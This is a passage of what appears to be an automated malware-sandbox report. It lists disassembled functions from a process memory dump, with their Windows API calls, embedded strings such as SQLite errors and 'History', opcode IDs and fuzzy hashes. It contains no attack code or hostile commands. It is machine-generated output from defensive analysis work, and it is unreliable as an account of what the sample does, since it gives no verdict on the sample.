                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                    • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                    Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                    • String ID: AE
                                                                                                                                                                                    • API String ID: 3548547718-685266089
                                                                                                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                    Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID: AE$"
                                                                                                                                                                                    • API String ID: 568519121-1989281832
                                                                                                                                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 210187428-168460110
